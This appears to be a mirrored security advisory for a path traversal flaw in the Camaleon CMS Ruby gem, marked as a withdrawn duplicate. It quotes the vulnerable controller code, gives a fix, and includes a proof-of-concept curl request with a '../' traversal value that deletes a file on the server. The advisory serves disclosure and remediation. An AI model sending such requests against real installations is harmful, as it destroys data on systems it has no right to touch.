logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

GHSA-3hp8-6j24-m5gm camaleon_cms

Package

Manager: gem
Name: camaleon_cms
Vulnerable Version: <0

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

Duplicate Advisory: Camaleon CMS vulnerable to remote code execution through code injection (GHSL-2024-185) # Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-7x4w-cj9r-h4v9. This link is maintained to preserve external references. # Original Description The [actions](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L51-L52) defined inside of the MediaController class do not check whether a given path is inside a certain path (e.g. inside the media folder). If an attacker performed an account takeover of an administrator account (See: GHSL-2024-184) they could delete arbitrary files or folders on the server hosting Camaleon CMS. The [crop_url](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L64-L65) action might make arbitrary file writes (similar impact to GHSL-2024-182) for any authenticated user possible, but it doesn't seem to work currently. Arbitrary file deletion can be exploited with following code path: The parameter folder flows from the actions method: ```ruby def actions authorize! :manage, :media if params[:media_action] != 'crop_url' params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present? case params[:media_action] [..] when 'del_file' cama_uploader.delete_file(params[:folder].gsub('//', '/')) render plain: '' ``` into the method delete_file of the CamaleonCmsLocalUploader class (when files are uploaded locally): ```ruby def delete_file(key) file = File.join(@root_folder, key) FileUtils.rm(file) if File.exist? file @instance.hooks_run('after_delete', key) get_media_collection.find_by_key(key).take.destroy end ``` Where it is joined in an unchecked manner with the root folder and then deleted. **Proof of concept** The following request would delete the file README.md in the top folder of the Ruby on Rails application. (The values for auth_token, X-CSRF-Token and _cms_session would also need to be replaced with authenticated values in the curl command below) ``` curl --path-as-is -i -s -k -X $'POST' \ -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' -H $'Connection: keep-alive' \ -b $'auth_token=[..]; _cms_session=[..]' \ --data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=.. 2F.. 2F.. 2FREADME.md&media_action=del_file' \ $'https://<camaleon-host>/admin/media/actions?actions=true' ``` **Impact** This issue may lead to a defective CMS or system. **Remediation** Normalize all file paths constructed from untrusted user input before using them and check that the resulting path is inside the targeted directory. Additionally, do not allow character sequences such as .. in untrusted input that is used to build paths. **See also:** [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/) [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)

Metadata

Created: 2024-09-23T22:05:58Z
Modified: 2025-05-23T20:02:04Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-3hp8-6j24-m5gm/GHSA-3hp8-6j24-m5gm.json
CWE IDs: []
Alternative ID: N/A
Finding: F063
Auto approve: 1